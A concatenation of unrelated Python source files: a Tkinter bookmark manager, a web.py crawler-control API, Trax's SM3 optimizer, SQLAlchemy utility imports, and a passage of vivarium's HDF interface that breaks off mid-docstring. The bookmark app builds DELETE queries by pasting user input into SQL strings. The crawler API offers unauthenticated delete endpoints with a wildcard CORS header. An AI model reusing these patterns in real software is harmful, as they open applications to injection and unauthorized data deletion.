html_file.write('\n<!--2-->\n<style type="text/css">\nbody{font-family:Century Gothic;background:rgb(50,137,124);text-decoration:none;}\n.Clases{display:grid;grid-template-columns:1fr 1fr 1fr;}\n.Clase{ background-color:rgba(74,184,173,1);text-align:center;border-style:solid;border-width:10px;border-color:rgba(248,181,50,1);border-collapse:collapse;margin:10px;}\n.Clase h3{font-size:25px;color:rgba(255,73,25,1);margin:20px;padding:0px;}\n.Clase a{text-decoration:none;color:rgba(250,250,250,1);}\n</style>')
elif varcss == 3:
html_file.write('\n<!--3-->\n<style type="text/css">\nbody{font-family:Century Gothic;background:rgb(7,30,37);text-decoration:none;}\n.Clases{display:grid;grid-template-columns:1fr 1fr 1fr;}\n.Clase{ background-color:rgba(6,57,75,1);text-align:center;border-style:solid;border-width:10px;border-color:rgba(34,160,182,1);border-collapse:collapse;margin:10px;}\n.Clase h3{font-size:25px;color:rgba(203,12,69,1);margin:20px;padding:0px;}\n.Clase a{text-decoration:none;color:rgba(250,250,250,1);}\n</style>')
html_file.write('\n</head>\n<body><section class="Clases">')
#Write all bookmarks
for e in labellist:
if e != labellist[0]:
html_file.write('</section>')
html_file.write('<section class="Clase">')
html_file.write('<h3>' + str(e) + '</h3> <br / > \n')
for i in bookmarkslist:
if e == i[0]:
html_file.write('<a href="' + str(i[2]) + '">' + str(i[1]) + '</a> <br / > \n')
html_file.write('</section></body>\n</html>')
html_file.close()
myconnection.close()
except:
pass
#deletebookmark: Delete the marker and if it is the case delete the Label with all its markers
def deletebookmark():
try:
myconnection=sqlite3.connect("BBDD")
mycursor=myconnection.cursor()
mycursor.execute("SELECT * FROM BOOKMARKS ")
bookmarkslist=mycursor.fetchall()
#Check if the name of the bookmark to delete exists
if entrybookmark.get() != '':
for i in bookmarkslist:
#When I find the bookmark
if i[1] == entrybookmark.get():
#Ask if you want to delete it
if(messagebox.askyesno("Are you sure you want to delete? "," Are you sure you want to delete the bookmark " + entrybookmark.get() + "?")):
mycursor.execute("DELETE FROM BOOKMARKS WHERE BOOKMARK=" + "'" + entrybookmark.get() + "'" )
break
else:
break
#If not found the bookmark Show error
elif i[1]==(bookmarkslist[len(bookmarkslist)-1][1]):
messagebox.showerror("Error "," Cannot find a bookmark named: " + entrybookmark.get())
#check if what you want to delete are all the bookmarks of the label
elif entrylabel.get() != '' and entrybookmark.get() == '':
for i in bookmarkslist:
if i[0] == entrylabel.get():
if(messagebox.askyesno("Are you sure you want to delete? "," Are you sure you want to delete the label " + entrylabel.get() + "?")):
for i in bookmarkslist:
mycursor.execute("DELETE FROM BOOKMARKS WHERE LABEL=" + "'" + entrylabel.get() + "'" )
break
else:
break
#If it does not exist Show error
elif i==(bookmarkslist[len(bookmarkslist)-1]):
messagebox.showerror("Error "," Cannot find a tag named: " + entrylabel.get())
else:
#If there is nothing Show error
messagebox.showerror("Error "," The marker or tag name cannot be found or is incorrect")
myconnection.commit()
myconnection.close()
writehtml()
except:
pass
#Graphic interface
#Root, frame and configuration
root= Tk()
root.resizable(False,False)
root.title("BookMarks")
frame=Frame(root)
frame.pack()
#StringVars
strlabel = StringVar()
strbookmark = StringVar()
strurl = StringVar()
#Entrys
entrylabel=Entry(frame, textvariable=strlabel)
entrylabel.grid(row=0, column = 1,padx=10,pady=10)
entrybookmark=Entry(frame, textvariable=strbookmark)
entrybookmark.grid(row=1, column = 1,padx=10,pady=10)
entryurl=Entry(frame, textvariable=strurl)
entryurl.grid(row=2, column = 1,padx=10,pady=10)
#Labels
entryla=Label(frame, text="Label")
entryla.grid(row=0, column=0, sticky="w", padx=10,pady=10)
entrybook=Label(frame, text="Bookmark")
entrybook.grid(row=1, column=0, sticky="w", padx=10,pady=10)
entryur=Label(frame, text="URL")
entryur.grid(row=2, column=0, sticky="w", padx=10,pady=10)
entrystyle=Label(frame, text="Page style:")
entrystyle.grid(row=4, column=0, sticky="w", padx=10,pady=10)
#Buttons
savebutton=Button(frame, text="Save",command=savebookmark)
savebutton.grid(row=3,column=0,sticky="w", padx=10,pady=10)
botonborrar=Button(frame, text="Delete",command=deletebookmark)
botonborrar.grid(row=3,column=1,sticky="w", padx=10,pady=10)
botonborrar=Button(frame, text="Eewrite HTML",command=writehtml)
botonborrar.grid(row=3,column=2,sticky="w", padx=10,pady=10)
#Radio buttons
radiovarcss=IntVar()
Radiobutton(root, text="Night", variable = radiovarcss, value = 1, command=writehtml).pack()
Radiobutton(root, text="Day", variable = radiovarcss, value = 2, command=writehtml).pack()
Radiobutton(root, text="Cyberpunk", variable = radiovarcss, value = 3, command=writehtml).pack()
root= mainloop()
|
<reponame>chongiadung/choinho
#!/usr/bin/env python
# encoding: utf-8
"""
scraper_webapp.py
Created by <NAME> on 2013-01-09.
Copyright (c) 2013 CGD Inc. All rights reserved.
"""
import json
from common import util_crawler as uc
import web
import os
import config
from common import util_rest as ur
import crawled_products_service as cps
import scraper_service as ss
import monitor_crawler_service as mcs
from service import crawl_url_script as cus
import requests
import logging
#import xmltodict
urls = (
'/help', 'help',
# crawler api
'/crawler/generate', 'generate',
'/crawler/startcrawl', 'startcrawl',
'/crawler/stopcrawl', 'stopcrawl',
'/crawler/taillog', 'taillog',
'/crawler/delete_source', 'delete_source',
'/crawler/thread_count', 'thread_count',
'/crawler/stopSpiders', 'stopSpiders',
'/crawler/insert_spider', 'insert_spider',
'/crawler/check_parse_item', 'checkParseItem',
'/crawler/crawl_product', 'crawlProduct',
'/crawler/debugCrawler', 'debugCrawler',
'/crawler/debugCrawler/fixBug', 'fixBug',
'/crawler/delete', 'delete',
'/crawler/spider_history', 'spider_history',
'/crawler/update_category_blacklist', 'update_category_blacklist',
# Statistic api
'/stats/crawled_products', 'crawled_products',
'/stats/onlinefriday', 'onlinefriday',
# san_gia api
'/san_gia/sangia_products', 'sangia_products',
# kpi crawler
'/kpi/spiders_started', 'number_spiders_started',
'/kpi/spiders_stopped', 'number_spiders_stopped',
'/kpi/spiders_created', 'number_spiders_created',
# '/kpi/spiders_delete', 'number_spiders_delete',
'/kpi/items_crawled', 'number_items_crawled'
)
NUM_SECONDS_IN_A_DAY = 60 * 60 * 24
#docs for help
docs = {}
class delete:
docs['del_file'] = [
('method', 'GET'),
('path', '/crawler/delete?spider_name=...&type_file=...'),
('description', 'delete spider python file')
]
def GET(self):
web.header('Content-Type', 'text/plain; charset=UTF-8')
web.header('Access-Control-Allow-Origin','*')
params = web.input(spider_name=None, _type=None)
spider_name = params.spider_name
_type = params._type
if spider_name is None or spider_name == "" or _type is None or _type == "":
return "Spider_name or type_file is None!"
else:
return ss.delete(spider_name, _type)
class stopSpiders:
docs['stopSpiders'] = [
('method', 'GET'),
('path', '/crawler/stopSpiders'),
('description', 'stop all running spiders')
]
def GET(self):
web.header('Content-Type', 'application/json; charset=UTF-8')
web.header('Access-Control-Allow-Origin','*')
return ss.stopAllSpider()
class help:
def GET(self):
web.header('Content-Type', 'text/plain; charset=UTF-8')
web.header('Access-Control-Allow-Origin','*')
return ur.formatDocs('Scraper API:', docs)
class generate:
docs['generate'] = [
('method', 'GET'),
('path', '/crawler/generate?spider=...&overWrite=true/false'),
('description', 'generate spider')
]
def GET(self):
params = web.input(spider = None, over_write = 'false')
web.header('Content-Type', 'text/plain; charset=UTF-8')
web.header('Access-Control-Allow-Origin','*')
spider = params.spider
over_write = params.over_write
if spider == None: return 'Missing spider name: spider=...'
response = ss.generateSpider(spider, over_write)
return response
class checkParseItem:
docs['checkParseItem'] = [
('method', 'GET'),
('path', '/crawler/check_parse_item?url=...'),
('description', 'Use xpath to parse item from url')
]
def GET(self):
params = web.input(spider = None)
web.header('Content-Type', 'text/plain; charset=UTF-8')
web.header('Access-Control-Allow-Origin','*')
url = params.url
if url is None: return 'Missing Url: url=...'
response = ss.check_parse_item(url)
return json.dumps(response)
class delete_source:
docs['delete_source'] = [
('method', 'GET'),
('path', '/crawler/delete_source?source=...'),
('description', 'delete items from source')
]
def GET(self):
params = web.input(spider = None)
web.header('Content-Type', 'text/plain; charset=UTF-8')
web.header('Access-Control-Allow-Origin','*')
source = params.source
if source == None: return 'Missing source name: source=...'
response = uc.delete(source)
return response
class startcrawl:
docs['startcrawl'] = [
('method', 'GET'),
('path', '/crawler/startcrawl?spider=...'),
('description', 'start spider')
]
def GET(self):
params = web.input(spider = None)
web.header('Content-Type', 'text/plain; charset=UTF-8')
web.header('Access-Control-Allow-Origin','*')
spider = params.spider
if spider == None or spider == "": return 'Missing spider name: spider=...'
response = ss.startCrawl(spider)
raise web.seeother(response)
class stopcrawl:
docs['stopcrawl'] = [
('method', 'GET'),
('path', '/crawler/stopcrawl?spider=...'),
('description', 'stop spider')
]
def GET(self):
params = web.input(spider = None)
web.header('Content-Type', 'text/plain; charset=UTF-8')
web.header('Access-Control-Allow-Origin','*')
spider = params.spider
if spider == None: return 'Missing spider name: spider=...'
response = ss.stopCrawl(spider)
raise web.seeother(response)
class taillog:
docs['taillog'] = [
('method', 'GET'),
('path', '/crawler/taillog?spider=...&number=...'),
('description', 'view log of a spider given last number of log lines')
]
def GET(self):
params = web.input(spider = None, number = 100,files=None)
web.header('Content-Type', 'text/plain; charset=UTF-8')
web.header('Access-Control-Allow-Origin','*')
spider = params.spider
numberLine = params.number
files = params.files
if spider == None: return 'Missing spider name: spider=...'
response = ss.tailLog(spider, numberLine, files)
return response
class crawlProduct:
docs['crawl_product'] = [
('method', 'GET'),
('path', '/crawler/crawl_product?url=...'),
('description', 'crawl an item from given url')
]
def GET(self):
params = web.input(url = None)
web.header('Content-Type', 'application/json; charset=UTF-8')
web.header('Access-Control-Allow-Origin','*')
import urllib
url = urllib.unquote_plus(params.url)
if url == None: return 'Missing url: url =...'
print "Crawling ..." + url
response = cus.crawlProduct(url)
return json.dumps(response.__dict__)
class thread_count:
docs['thread_count'] = [
('method', 'GET'),
('path', '/crawler/thread_count'),
('description', 'Count the number of crawling service currently started')
]
def GET(self):
web.header('Content-Type', 'text/plain; charset=UTF-8')
web.header('Access-Control-Allow-Origin','*')
response = json.dumps(ss.threadCount())
return response
class crawled_products:
docs['crawled_products'] = [
('method', 'GET'),
('description', 'Get list of crawled items by some criterias'),
('path', '/stats/crawled_products?start=...&limit=...&source=...&sincedays=...&beforeday=...&facetsize=...&missing=...&expired=true/false'),
('param missing', 'list of field name seperated by ,. example: missing=price,category')
]
def GET(self):
web.header('Content-Type', 'application/json; charset=UTF-8')
web.header('Access-Control-Allow-Origin','*')
params = web.input(start = 0, limit = 10, sincedays = None, beforedays = None, source = None, facetsize = 100, missing = None, exists = None, expired = None, sort=None)
start = int(params.start)
limit = int(params.limit)
sincedays = params.sincedays
beforedays = params.beforedays
facetsize = int(params.facetsize)
missing = params.missing
exists = params.exists
source = params.source
expired = params.expired
sort = params.sort
response = cps.getItems(start, limit, sincedays, beforedays, source, facetsize, missing, exists, expired,sort)
return json.dumps(response)
class debugCrawler:
docs['debugCrawler'] = [
('method', 'GET'),
('path', '/crawler/debugCrawler'),
('description', 'return list spiders not running, missing, duplicate')
]
def GET(self):
web.header('Content-Type', 'application/json; charset=UTF-8')
web.header('Access-Control-Allow-Origin','*')
return json.dumps(mcs.get_debugCrawler())
class fixBug:
docs['fixBug'] = [
('method', 'GET'),
('path', '/crawler/debugCrawler/fixBug'),
('description', 'return list spiders not running, missing, duplicate')
]
def GET(self):
web.header('Content-Type', 'application/json; charset=UTF-8')
web.header('Access-Control-Allow-Origin','*')
return json.dumps(mcs.fixBugSpiderNotRun(None))
class insert_spider:
docs['insert_spider'] = [
('method', 'GET'),
('path', '/crawler/insert_spider'),
('description', 'Insert new spider to mongodb')
]
def POST(self):
web.header('Content-Type', 'application/json; charset=UTF-8')
web.header('Access-Control-Allow-Origin','*')
document = web.data()
return ss.insertSpider(json.loads(document))
class spider_history:
docs['spider_history'] = [
('method', 'GET'),
('path', '/crawler/spider_history?spider_name=...'),
('description', 'return history crawler of spider')
]
def GET(self):
web.header('Content-Type', 'application/json; charset=UTF-8')
web.header('Access-Control-Allow-Origin', '*')
parms = web.input(spider_name=None)
spider_name = parms.spider_name
if spider_name:
return ss.get_spider_history(spider_name)
return "Missing spider name!"
class number_spiders_started:
docs['number spiders started'] = [
('method', 'GET'),
('path', '/kpi/spiders_started?days=...'),
('description', 'return number spider started in a day')
]
def GET(self):
web.header('Content-Type', 'application/json; charset=UTF-8')
web.header('Access-Control-Allow-Origin', '*')
parms = web.input(days=None)
days = parms.days
if days:
return json.dumps(ss.get_number_spiders_started(int(days)))
return "Missing day parameter!"
class number_spiders_stopped:
docs['number spiders stopped'] = [
('method', 'GET'),
('path', '/kpi/spiders_stopped?days=...'),
('description', 'return number spider stopped in a day')
]
def GET(self):
web.header('Content-Type', 'application/json; charset=UTF-8')
web.header('Access-Control-Allow-Origin', '*')
parms = web.input(days=None)
days = parms.days
if days:
return json.dumps(ss.get_number_spiders_stopped(int(days)))
return "Missing day parameter!"
class number_spiders_created:
docs['number spiders created'] = [
('method', 'GET'),
('path', '/kpi/spiders_created?days=...'),
('description', 'return number spiders created in a day')
]
def GET(self):
web.header('Content-Type', 'application/json; charset=UTF-8')
web.header('Access-Control-Allow-Origin', '*')
parms = web.input(days=None)
days = parms.days
if days:
return json.dumps(ss.get_number_spider_created(int(days)))
return "Missing day parameter!"
class number_items_crawled:
docs['number items crawled'] = [
('method', 'GET'),
('path', '/kpi/items_crawled?days=...'),
('description', 'return number items crawled in a day')
]
def GET(self):
web.header('Content-Type', 'application/json; charset=UTF-8')
web.header('Access-Control-Allow-Origin', '*')
parms = web.input(days=None)
days = parms.days
if days:
res = json.loads(requests.get('http://localhost:6081/stats/crawled_products?missing=expired&sincedays=' + days).text)
return res['total_items']
return "Missing day parameter!"
class update_category_blacklist:
docs['update category blacklist'] = [
('method', 'GET'),
('path', '/crawler/update_category_blacklist'),
('description', 'update category blacklist from mongodb')
]
def GET(self):
web.header('Content-Type', 'application/json; charset=UTF-8')
web.header('Access-Control-Allow-Origin', '*')
ss.update_category_blacklist()
return 'Success!'
def main():
os.chdir(config.CRAWL_DIR)
app = web.application(urls, globals())
app.run()
logging.info('Start Done!')
if __name__ == '__main__':
main()
|
# coding=utf-8
# Copyright 2021 The Trax Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""SM3 optimizer class."""
import enum
from trax.fastmath import numpy as jnp
from trax.optimizers import base as opt_base
class MomentumType(enum.IntEnum):
EMA = 1
HEAVY_BALL = 2
NESTEROV = 3
class SM3(opt_base.Optimizer):
"""SM3 optimizer, as described in https://arxiv.org/abs/1901.11150."""
def __init__(self,
learning_rate=0.01,
momentum=0.9,
second_moment_averaging=1.0,
weight_decay=0.0,
momentum_type=MomentumType.EMA): # pylint: disable=useless-super-delegation
"""Create the SM3 optimizer.
Memory-Efficient Adaptive Optimization.
https://arxiv.org/abs/1901.11150
Args:
learning_rate: a postitive scalar value for the initial learning rate.
momentum: optional, a positive scalar value for momentum
second_moment_averaging: averaging of second moments (if 1.0, adds from
begining of time like AdaGrad).
weight_decay: Weight decay for regularizing the model.
momentum_type: Nestrov, Heavy-Ball or EMA (Default).
"""
self._has_momentum = momentum > 0.0
self._momentum_type = momentum_type
self._graft = second_moment_averaging != 1.0
super().__init__(
learning_rate=learning_rate,
momentum=momentum,
second_moment_averaging=second_moment_averaging,
weight_decay=weight_decay,
)
def init(self, w):
momentum = []
if self._has_momentum:
momentum = jnp.zeros_like(w)
v1s = [jnp.zeros(sz, dtype=w.dtype) for sz in w.shape]
v2s = []
if self._graft:
v2s = [jnp.zeros(sz, dtype=w.dtype) for sz in w.shape]
return (momentum, v1s, v2s)
def _momentum_update(self, g, m, beta1):
"""Handle various types of momentum."""
if self._momentum_type == MomentumType.EMA:
m = (1 - beta1) * g + beta1 * m
update = m
elif self._momentum_type == MomentumType.HEAVY_BALL:
m = g + beta1 * m
update = m
elif self._momentum_type == MomentumType.NESTEROV:
m = g + beta1 * m
nesterov_m = g + beta1 * m
update = nesterov_m
else:
assert False, 'Unknown momentum_type.'
return m, update
def _update_diagonal(self, g, w, m, v1, v2, opt_params):
learning_rate = opt_params['learning_rate']
beta2 = opt_params['second_moment_averaging']
weight_decay = opt_params['weight_decay']
is_beta2_1 = (beta2 == 1).astype(g.dtype)
w = is_beta2_1 + (1.0 - beta2) * (1.0 - is_beta2_1)
v1[0] = beta2 * v1[0] + w * g * g
preconditioner = jnp.where(v1[0] > 0, 1.0 / (jnp.sqrt(v1[0]) + 1e-16),
jnp.zeros_like(v1[0]))
pg = preconditioner * g
if self._graft:
v2[0] += g * g
preconditioner_graft = jnp.where(
v2[0] > 0, 1.0 / (jnp.sqrt(v2[0]) + 1e-16), jnp.zeros_like(v2[0]))
pg_graft = preconditioner_graft * g
pg_norm = jnp.linalg.norm(pg)
pg_graft_norm = jnp.linalg.norm(pg_graft)
pg = pg * (pg_graft_norm/(pg_norm + 1e-16))
pg = pg + w * weight_decay
if self._has_momentum:
m, update = self._momentum_update(pg, m, opt_params['momentum'])
else:
update = pg
w = w - (update * learning_rate).astype(w.dtype)
return w, (m, v1, v2)
def _expanded_shape(self, shape, axis):
# Replaces a `shape` of [M, N, K] with 1 in all dimensions except for i.
# For eg: i = 1 returns [1, N, 1].
rank = len(shape)
return [1] * axis + [shape[axis]] + [1] * (rank - axis - 1)
def _minimum(self, tensor_list):
minimum = tensor_list[0]
for i in range(1, len(tensor_list)):
minimum = jnp.minimum(minimum, tensor_list[i])
return minimum
def _update_sketched(self, g, w, m, v1, v2, opt_params):
"""Update for higher-rank parameters."""
learning_rate = opt_params['learning_rate']
momentum = opt_params['momentum']
beta2 = opt_params['second_moment_averaging']
weight_decay = opt_params['weight_decay']
shape = w.shape
rank = len(shape)
reshaped_accumulators = [jnp.reshape(v1[i], self._expanded_shape(shape, i))
for i in range(rank)]
acc = self._minimum(reshaped_accumulators)
is_beta2_1 = (beta2 == 1).astype(g.dtype)
w = is_beta2_1 + (1.0 - beta2) * (1.0 - is_beta2_1)
acc = beta2 * acc + w * g * g
preconditioner = jnp.where(acc > 0.0, 1.0 / (jnp.sqrt(acc) + 1e-16),
jnp.zeros_like(acc))
pg = g * preconditioner
if self._graft:
v2_acc = self._minimum([
jnp.reshape(v2[i], self._expanded_shape(shape, i))
for i in range(rank)
])
v2_acc = v2_acc + g * g
preconditioner_graft = jnp.where(v2_acc > 0.0,
1.0 / (jnp.sqrt(v2_acc) + 1e-16),
jnp.zeros_like(v2_acc))
pg_graft = preconditioner_graft * g
pg_norm = jnp.linalg.norm(pg)
pg_graft_norm = jnp.linalg.norm(pg_graft)
pg = pg * (pg_graft_norm/(pg_norm + 1e-16))
pg = pg + w * weight_decay
if self._has_momentum:
m, update = self._momentum_update(pg, m, momentum)
else:
update = pg
w = w - (learning_rate * update).astype(w.dtype)
for i in range(len(v1)):
axes = list(range(int(i))) + list(range(int(i) + 1, rank))
dim_accumulator = jnp.amax(acc, axis=axes)
v1[i] = dim_accumulator
if self._graft:
for i in range(len(v2)):
axes = list(range(int(i))) + list(range(int(i) + 1, rank))
dim_accumulator = jnp.amax(v2_acc, axis=axes)
v2[i] = dim_accumulator
return w, (m, v1, v2)
def update(self, step, g, w, slots, opt_params):
del step
m, v1, v2 = slots
rank = len(w.shape)
if rank > 1:
return self._update_sketched(g, w, m, v1, v2, opt_params)
else:
return self._update_diagonal(g, w, m, v1, v2, opt_params)
|
<filename>lib/sqlalchemy/util/__init__.py
# util/__init__.py
# Copyright (C) 2005-2022 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: https://www.opensource.org/licenses/mit-license.php
from collections import defaultdict as defaultdict
from functools import partial as partial
from functools import update_wrapper as update_wrapper
from ._collections import coerce_generator_arg as coerce_generator_arg
from ._collections import coerce_to_immutabledict as coerce_to_immutabledict
from ._collections import column_dict as column_dict
from ._collections import column_set as column_set
from ._collections import EMPTY_DICT as EMPTY_DICT
from ._collections import EMPTY_SET as EMPTY_SET
from ._collections import FacadeDict as FacadeDict
from ._collections import flatten_iterator as flatten_iterator
from ._collections import has_dupes as has_dupes
from ._collections import has_intersection as has_intersection
from ._collections import IdentitySet as IdentitySet
from ._collections import ImmutableContainer as ImmutableContainer
from ._collections import immutabledict as immutabledict
from ._collections import ImmutableProperties as ImmutableProperties
from ._collections import LRUCache as LRUCache
from ._collections import merge_lists_w_ordering as merge_lists_w_ordering
from ._collections import ordered_column_set as ordered_column_set
from ._collections import OrderedDict as OrderedDict
from ._collections import OrderedIdentitySet as OrderedIdentitySet
from ._collections import OrderedProperties as OrderedProperties
from ._collections import OrderedSet as OrderedSet
from ._collections import PopulateDict as PopulateDict
from ._collections import Properties as Properties
from ._collections import ScopedRegistry as ScopedRegistry
from ._collections import sort_dictionary as sort_dictionary
from ._collections import ThreadLocalRegistry as ThreadLocalRegistry
from ._collections import to_column_set as to_column_set
from ._collections import to_list as to_list
from ._collections import to_set as to_set
from ._collections import unique_list as unique_list
from ._collections import UniqueAppender as UniqueAppender
from ._collections import update_copy as update_copy
from ._collections import WeakPopulateDict as WeakPopulateDict
from ._collections import WeakSequence as WeakSequence
from ._preloaded import preload_module as preload_module
from ._preloaded import preloaded as preloaded
from .compat import arm as arm
from .compat import b as b
from .compat import b64decode as b64decode
from .compat import b64encode as b64encode
from .compat import cmp as cmp
from .compat import cpython as cpython
from .compat import dataclass_fields as dataclass_fields
from .compat import decode_backslashreplace as decode_backslashreplace
from .compat import dottedgetter as dottedgetter
from .compat import has_refcount_gc as has_refcount_gc
from .compat import inspect_getfullargspec as inspect_getfullargspec
from .compat import local_dataclass_fields as local_dataclass_fields
from .compat import osx as osx
from .compat import py38 as py38
from .compat import py39 as py39
from .compat import pypy as pypy
from .compat import win32 as win32
from .concurrency import await_fallback as await_fallback
from .concurrency import await_only as await_only
from .concurrency import greenlet_spawn as greenlet_spawn
from .concurrency import is_exit_exception as is_exit_exception
from .deprecations import became_legacy_20 as became_legacy_20
from .deprecations import deprecated as deprecated
from .deprecations import deprecated_cls as deprecated_cls
from .deprecations import deprecated_params as deprecated_params
from .deprecations import deprecated_property as deprecated_property
from .deprecations import moved_20 as moved_20
from .deprecations import warn_deprecated as warn_deprecated
from .langhelpers import add_parameter_text as add_parameter_text
from .langhelpers import as_interface as as_interface
from .langhelpers import asbool as asbool
from .langhelpers import asint as asint
from .langhelpers import assert_arg_type as assert_arg_type
from .langhelpers import attrsetter as attrsetter
from .langhelpers import bool_or_str as bool_or_str
from .langhelpers import chop_traceback as chop_traceback
from .langhelpers import class_hierarchy as class_hierarchy
from .langhelpers import classproperty as classproperty
from .langhelpers import clsname_as_plain_name as clsname_as_plain_name
from .langhelpers import coerce_kw_type as coerce_kw_type
from .langhelpers import constructor_copy as constructor_copy
from .langhelpers import constructor_key as constructor_key
from .langhelpers import counter as counter
from .langhelpers import create_proxy_methods as create_proxy_methods
from .langhelpers import decode_slice as decode_slice
from .langhelpers import decorator as decorator
from .langhelpers import dictlike_iteritems as dictlike_iteritems
from .langhelpers import duck_type_collection as duck_type_collection
from .langhelpers import ellipses_string as ellipses_string
from .langhelpers import EnsureKWArg as EnsureKWArg
from .langhelpers import format_argspec_init as format_argspec_init
from .langhelpers import format_argspec_plus as format_argspec_plus
from .langhelpers import generic_fn_descriptor as generic_fn_descriptor
from .langhelpers import generic_repr as generic_repr
from .langhelpers import get_annotations as get_annotations
from .langhelpers import get_callable_argspec as get_callable_argspec
from .langhelpers import get_cls_kwargs as get_cls_kwargs
from .langhelpers import get_func_kwargs as get_func_kwargs
from .langhelpers import getargspec_init as getargspec_init
from .langhelpers import has_compiled_ext as has_compiled_ext
from .langhelpers import HasMemoized as HasMemoized
from .langhelpers import hybridmethod as hybridmethod
from .langhelpers import hybridproperty as hybridproperty
from .langhelpers import inject_docstring_text as inject_docstring_text
from .langhelpers import iterate_attributes as iterate_attributes
from .langhelpers import map_bits as map_bits
from .langhelpers import md5_hex as md5_hex
from .langhelpers import memoized_instancemethod as memoized_instancemethod
from .langhelpers import memoized_property as memoized_property
from .langhelpers import MemoizedSlots as MemoizedSlots
from .langhelpers import method_is_overridden as method_is_overridden
from .langhelpers import methods_equivalent as methods_equivalent
from .langhelpers import (
monkeypatch_proxied_specials as monkeypatch_proxied_specials,
)
from .langhelpers import non_memoized_property as non_memoized_property
from .langhelpers import NoneType as NoneType
from .langhelpers import only_once as only_once
from .langhelpers import (
parse_user_argument_for_enum as parse_user_argument_for_enum,
)
from .langhelpers import PluginLoader as PluginLoader
from .langhelpers import portable_instancemethod as portable_instancemethod
from .langhelpers import quoted_token_parser as quoted_token_parser
from .langhelpers import safe_reraise as safe_reraise
from .langhelpers import set_creation_order as set_creation_order
from .langhelpers import string_or_unprintable as string_or_unprintable
from .langhelpers import symbol as symbol
from .langhelpers import TypingOnly as TypingOnly
from .langhelpers import (
unbound_method_to_callable as unbound_method_to_callable,
)
from .langhelpers import walk_subclasses as walk_subclasses
from .langhelpers import warn as warn
from .langhelpers import warn_exception as warn_exception
from .langhelpers import warn_limited as warn_limited
from .langhelpers import wrap_callable as wrap_callable
|
<filename>src/vivarium/framework/artifact/hdf.py
"""
=============
HDF Interface
=============
A convenience wrapper around the `tables <https://www.pytables.org>`_ and
:mod:`pandas` HDF interfaces.
Public Interface
----------------
The public interface consists of 5 functions:
.. list-table:: HDF Public Interface
:widths: 20 60
:header-rows: 1
* - Function
- Description
* - :func:`touch`
- Creates an HDF file, wiping an existing file if necessary.
* - :func:`write`
- Stores data at a key in an HDF file.
* - :func:`load`
- Loads (potentially filtered) data from a key in an HDF file.
* - :func:`remove`
- Clears data from a key in an HDF file.
* - :func:`get_keys`
- Gets all available HDF keys from an HDF file.
Contracts
+++++++++
- All functions in the public interface accept both :class:`pathlib.Path` and
normal Python :class:`str` objects for paths.
- All functions in the public interface accept only :class:`str` objects
as representations of the keys in the hdf file. The strings must be
formatted as ``"type.name.measure"`` or ``"type.measure"``.
"""
import json
from pathlib import Path
from typing import Any, List, Optional, Union
import re
import pandas as pd
import tables
from tables.nodes import filenode
PandasObj = (pd.DataFrame, pd.Series)
####################
# Public interface #
####################
def touch(path: Union[str, Path]):
"""Creates an HDF file, wiping an existing file if necessary.
If the given path is proper to create a HDF file, it creates a new
HDF file.
Parameters
----------
path
The path to the HDF file.
Raises
------
ValueError
If the non-proper path is given to create a HDF file.
"""
path = _get_valid_hdf_path(path)
with tables.open_file(str(path), mode='w'):
pass
def write(path: Union[str, Path], entity_key: str, data: Any):
"""Writes data to the HDF file at the given path to the given key.
Parameters
----------
path
The path to the HDF file to write to.
entity_key
A string representation of the internal HDF path where we want to
write the data. The key must be formatted as ``"type.name.measure"``
or ``"type.measure"``.
data
The data to write. If it is a :mod:`pandas` object, it will be
written using a
`pandas.HDFStore <https://pandas.pydata.org/pandas-docs/stable/user_guide/io.html#hdf5-pytables>`_
or :meth:`pandas.DataFrame.to_hdf`. If it is some other kind of python
object, it will first be encoded as json with :func:`json.dumps` and
then written to the provided key.
Raises
------
ValueError
If the path or entity_key are improperly formatted.
"""
path = _get_valid_hdf_path(path)
entity_key = EntityKey(entity_key)
if isinstance(data, PandasObj):
_write_pandas_data(path, entity_key, data)
else:
_write_json_blob(path, entity_key, data)
def load(path: Union[str, Path], entity_key: str, filter_terms: Optional[List[str]],
column_filters: Optional[List[str]]) -> Any:
"""Loads data from an HDF file.
Parameters
----------
path
The path to the HDF file to load the data from.
entity_key
A representation of the internal HDF path where the data is located.
filter_terms
An optional list of terms used to filter the rows in the data.
The terms must be formatted in a way that is suitable for use with
the ``where`` argument of :func:`pandas.read_hdf`. Only
filters applying to existing columns in the data are used.
column_filters
An optional list of columns to load from the data.
Raises
------
ValueError
If the path or entity_key are improperly formatted.
Returns
-------
Any
The data stored at the the given key in the HDF file.
"""
path = _get_valid_hdf_path(path)
entity_key = EntityKey(entity_key)
with tables.open_file(str(path)) as file:
node = file.get_node(entity_key.path)
if isinstance(node, tables.earray.EArray):
# This should be a json encoded document rather than a pandas dataframe
with filenode.open_node(node) as file_node:
data = json.load(file_node)
else:
filter_terms = _get_valid_filter_terms(filter_terms, node.table.colnames)
with pd.HDFStore(str(path), complevel=9, mode='r') as store:
metadata = store.get_storer(entity_key.path).attrs.metadata # NOTE: must use attrs. write this up
if metadata.get('is_empty', False):
data = pd.read_hdf(path, entity_key.path, where=filter_terms)
data = data.set_index(list(data.columns)) # undoing transform performed on write
else:
data = pd.read_hdf(path, entity_key.path, where=filter_terms, columns=column_filters)
return data
def remove(path: Union[str, Path], entity_key: str):
"""Removes a piece of data from an HDF file.
Parameters
----------
path :
The path to the HDF file to remove the data from.
entity_key :
A representation of the internal HDF path where the data is located.
Raises
------
ValueError
If the path or entity_key are improperly formatted.
"""
path = _get_valid_hdf_path(path)
entity_key = EntityKey(entity_key)
with tables.open_file(str(path), mode='a') as file:
file.remove_node(entity_key.path, recursive=True)
def get_keys(path: str) -> List[str]:
"""Gets key representation of all paths in an HDF file.
Parameters
----------
path :
The path to the HDF file.
Returns
-------
List[str]
A list of key representations of the internal paths in the HDF.
"""
path = _get_valid_hdf_path(path)
with tables.open_file(str(path)) as file:
keys = _get_keys(file.root)
return keys
class EntityKey(str):
"""A convenience wrapper that translates artifact keys.
This class provides several representations of the artifact keys that
are useful when working with the :mod:`pandas` and
`tables <https://www.pytables.org>`_ HDF interfaces.
"""
def __init__(self, key):
"""
Parameters
----------
key
